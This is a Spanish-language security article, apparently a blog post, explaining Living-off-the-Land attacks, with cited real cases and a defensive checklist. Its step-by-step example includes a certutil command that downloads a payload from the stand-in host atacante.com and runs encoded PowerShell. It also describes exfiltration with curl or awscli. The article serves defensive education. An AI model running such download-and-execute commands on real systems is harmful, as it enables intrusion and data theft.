Living-off-the-land: el arte de atacar con las propias armas del sistema

Cuando imaginamos un ataque cibernético, pensamos en virus sofisticados, troyanos ocultos o malwares diseñados por genios oscuros del código. Pero la realidad es aún más inquietante: los atacantes modernos no siempre necesitan traer armas nuevas, porque pueden usar las que ya tienes en tu propio sistema.

Ese es el principio de las técnicas Living-off-the-Land (LOTL): atacar sin instalar nada extraño, usando únicamente herramientas nativas y legítimas del sistema operativo para moverse, espiar y robar.

¿Qué significa “vivir de la tierra”?

El término viene de la supervivencia: un viajero que no lleva provisiones, sino que vive de lo que encuentra en el camino.

En ciberseguridad, el atacante evita instalar programas maliciosos que puedan ser detectados y, en cambio, aprovecha los binarios y utilidades que ya están preinstalados en tu sistema.

• En Windows: PowerShell, WMI, Certutil, Bitsadmin, mshta.

• En Linux: Bash, Curl, Wget, Systemctl, Cron, netcat.

• En macOS: AppleScript, Automator, launchd, comandos de terminal.

Todo parece legítimo. Todo parece “normal”.

Ejemplo paso a paso de un ataque LOTL

1. Intrusión inicial: un atacante explota una vulnerabilidad en una aplicación web (por ejemplo, una inyección en una app PHP mal parcheada).

2. Ejecución con herramientas nativas: en vez de subir un ejecutable, usa:

   certutil -urlcache -split -f http://atacante.com/payload.b64 payload.exe powershell -EncodedCommand <comando_codificado>

   Certutil descarga y decodifica; PowerShell ejecuta sin dejar un binario clásico.

3. Persistencia con lo legítimo: crea una tarea programada (Scheduled Task / cron) o registra un servicio con sc/systemctl.

4. Movimiento lateral: utiliza WMI/SSH/SMB y credenciales robadas para pasar a otros servidores, todo con comandos estándar.

5. Exfiltración disfrazada: envía datos en tráfico HTTPS aparentemente legítimo o sube a un bucket en la nube usando curl/awscli.

Resultado: control y extracción de información sin generar artefactos evidentes en disco.

¿Por qué LOTL es tan difícil de detectar?

• No hay 'archivo malicioso': las defensas tradicionales basadas en firmas quedan obsoletas.

• Se mezclan con la administración legítima: acciones que parecen mantenimiento.

• Tardan en detectarse: sin alertas obvias, el atacante puede permanecer semanas o meses.

• Fácil escalabilidad: los atacantes reutilizan los mismos patrones en múltiples víctimas sin adaptar payloads binarios.

Casos reales para no dormir

• APT29 (Cozy Bear), un grupo vinculado a ataques a gobiernos, usó WMI y PowerShell para infiltrarse en sistemas diplomáticos sin necesidad de malware tradicional.

• SolarWinds (2020): los atacantes usaron LOTL para moverse silenciosamente por miles de empresas afectadas.

• En hospitales europeos durante la pandemia, atacantes desplegaron ransomware después de semanas de vigilancia LOTL: usaban solo herramientas legítimas para no ser detectados antes del golpe final.

• Variantes de campaigns de espionaje han usado cuentas legítimas y servicios en la nube para ocultar exfiltración de datos.

Estrategias prácticas para defenderte de LOTL

1. Monitoreo de comportamiento (Behavioral Analytics)

   • Vigila anomalías: procesos que ejecutan shells desde servidores web, PowerShell con parámetros inusuales, curl/wget en hosts que nunca deberían llamar a Internet.

2. Registro y visibilidad de línea de comandos

   • Oculta menos: registra la línea de comandos completa (cmdline) y quién la ejecutó.

3. Restricciones y políticas

   • AppLocker/WHfB en Windows o políticas de AppArmor/SELinux en Linux para limitar la ejecución de binarios por procesos no autorizados.

4. Principio de mínimos privilegios

   • Cuentas de servicio con permisos reducidos; evita usar root/Administrator para procesos web.

5. Segmentación de la red y control de egress

   • Limita conexiones salientes y crea listas blancas de destinos conocidos.

6. EDR + SIEM integrados

   • EDR para telemetría de endpoints y SIEM para correlación con logs de red y autenticación.

7. Protección de secretos y rotación

   • Vaults para credenciales, rotación automática y auditoría de usos.

8. Hardening de gestores y automatización de parches

   • Evita superficies atacables; mantén dependencias y SO actualizados.

9. Pruebas continuas (Purple/Red Teaming)

   • Simula LOTL internamente para medir detección y tiempos de respuesta.

Checklist corto para operaciones (acciones inmediatas)

• Habilitar logging de cmdline en servidores críticos.

• Revisar tareas programadas y servicios nuevos en los últimos 30 días.

• Bloquear egress innecesario desde servidores web.

• Aplicar AppLocker/SELinux para restringir utilidades sensibles.

• Revisar uso de PowerShell: activar Constrained Language Mode y bloquear -EncodedCommand no autorizados.

• Escanear por accesos inusuales a /tmp, C:\Windows\Temp y carpetas de usuarios.

El siguiente nivel: LOTL + automatización e IA

La convergencia entre LOTL y la automatización (incluyendo técnicas de IA) es la próxima amenaza: atacantes automatizan descubrimiento del entorno y seleccionan la herramienta nativa más conveniente para cada host. Así, la actividad maliciosa puede mimetizar los patrones de uso legítimo con precisión cada vez mayor.